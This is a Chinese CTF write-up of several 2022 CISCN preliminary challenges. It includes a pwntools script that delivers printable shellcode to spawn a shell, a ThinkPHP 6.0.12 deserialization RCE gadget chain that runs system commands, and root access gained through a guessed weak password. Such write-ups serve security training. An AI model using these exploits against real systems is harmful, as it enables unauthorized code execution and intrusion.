2022 CISCN 线上初赛 部分题目 Writeup By Xp0int xp0int Posted on May 30 2022 ## 1. PWN ### 1.1 login_normal `Author: xf1les` 直接找一段可见字符 shellcode 打就行了。 ``` #!/usr/bin/env python3 from pwn import * import warnings warnings.filterwarnings("ignore", category=BytesWarning) context(arch="amd64") context(log_level="debug") p = process("./login") sc = "RXWTYH39Yj0TYfi9XVWAXfi94WWAYjZTYfi9TVWAZjdTYfi9BgWZjmTYfi9ou0t860T88jZTYfi9VU0T8A0t8B0t8F0t8GRAPZ0t8MZRAPZ0t8QZ0t8R0t8SjnXQHszbinzzshRSToRWTnZPP" p.sendafter(">>> ", "opt:1\nmsg:ro0tt\n\r\n") p.sendafter(">>> ", f"opt:2\nmsg:{sc}P\n\r\n") p.interactive() ```  ## 2. CRYPTO ### 2.1 签到电台 `Author: k1rit0` 用密码本算出应该发的密文,然后send过去就行了,后面记得加个J ``` m = [1732,2514,1344,0356,0451,6671,0055] k = [1061,7388,4526,6188,9734,2825,8555] c = [2793,9892,5860,6434,9185,8496,8500] ``` ``` flag{7523096a-ef01-4c96-822f-5c73a67be852} ``` ### 2.2 基于挑战码的双向认证 1 2 3 `Author: k1rit0` 非预期 1 2 直接进/root/start.sh找到flag路径直接cat就行了 3 虽然调好了权限还是非预期了 su盲猜了一下常用密码,结果真的是弱口令toor拿到root权限 按照1,2题的路径cat就行了 ``` cat /root/cube-shell/instance/flag_server/flag2.txt 1. flag{fff12514-cf56-42f8-99f2-d8a76dc31ea9} 2. flag{34f5fdaf-c373-47fd-afab-01ed2914c11a} ``` ### 2.3 ISO9798 `Author: k1rit0` 先`proof_of_work`,爆破过完以后是一个协议的流程,发现其实密文都是分块的,而且互相没关系,换一下分块的顺序就能过认证了,直接密文平均分三份,去掉第三份,第一份和第二份换位置发过去即可。 没有写自动流程,都是纯手打的 ``` python from hashlib import sha256 String = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890abcdefghijklmnopqrstuvwxyz' def proof_of_work(END,HASH): for i in String: for j in String: for k in String: for l in String: s = i+j+k+l+END if sha256(s.encode()).hexdigest() == HASH: print("[+] send:",i+j+k+l) return i+j+k+l END = 'SsTP3gOuHQLYHDj7' HASH = 'b89b4829e92d12a713478d186a226dfbce7d73d93916b0d68eca81e3709db401' print(END,HASH) proof_of_work(END,HASH) # flag{ea865268-e711-471e-8080-b41102832ce2} ``` ## 3. WEB ### 3.1 Ezpop `Author: ABU` thinkphp 6.0.12框架,网上搜索后发现有一个反序列化漏洞,/www.zip发现能下载源码,审计后发现反序列化点在/index.php/index.php/test路由,post传参。 网上的poc <?php namespace think{ abstract class Model{ private $lazySave = false; private $data = []; private $exists = false; protected $table; private $withAttr = []; protected $json = []; protected $jsonAssoc = false; function __construct($obj = ''){ $this->lazySave = True; $this->data = ['whoami' => ['cat /flag.txt']]; $this->exists = True; $this->table = $obj; $this->withAttr = ['whoami' => ['system']]; $this->json = ['whoami',['whoami']]; $this->jsonAssoc = True; } } } namespace think\model{ use think\Model; class Pivot extends Model{ } } namespace{ echo(urlencode(serialize(new think\model\Pivot(new think\model\Pivot())))); } 直接打即可  ## 4. RE ### 4.1 baby_tree `Author: JANlittle` swift的语法树,直接写几个测试例子然后用`swiftc -dump-ast test.swift`观察规律,然后还原: ```python b=input.encode(utf-8) k=key.encode(utf-8) var r0=r1=r2=r3=UInt8 for i in range(0, len(b)-4): r0=b[i]; r1=b[i+1]; r2=b[i+2]; r3=b[i+3] b[i+0]=r2^((k[0]+(r0>>4))&0xff) b[i+1]=r3^((k[1]+(r1>>2))&0xff) b[i+2]=r0^k[2] b[i+3]=r1^k[3] k[0,1,2,3]=k[1,2,3,4] ``` 直接反求就好: ```python enc = [88, 35, 88, 225, 7, 201, 57, 94, 77, 56, 75, 168, 72, 218, 64, 91, 16, 101, 32, 207, 73, 130, 74, 128, 76, 201, 16, 248, 41, 205, 103, 84, 91, 99, 79, 202, 22, 131, 63, 255, 20, 16] key = list(b'345y') for i in range(len(enc)-4): key[0], key[1], key[2], key[3] = key[1], key[2], key[3], key[0] for i in range(len(enc)-4, -1, -1): r0 = key[2] ^ enc[i+2] r1 = key[3] ^ enc[i+3] r2 = enc[i+0] ^ ((key[0]+(r0 >> 4)) & 0xff) r3 = enc[i+1] ^ ((key[1]+(r1 >> 2)) & 0xff) enc[i+0], enc[i+1], enc[i+2], enc[i+3] = r0, r1, r2, r3 key[1], key[2], key[3], key[0] = key[0], key[1], key[2], key[3] print(bytes(enc)) ``` 打赏还是打残,这是个问题 赏 Wechat Pay Alipay 2022 强网杯初赛 Writeup By Xp0int 2022 广东省大学生网络攻防大赛部分题目 Writeup By Xp0int
没有帐号? 立即注册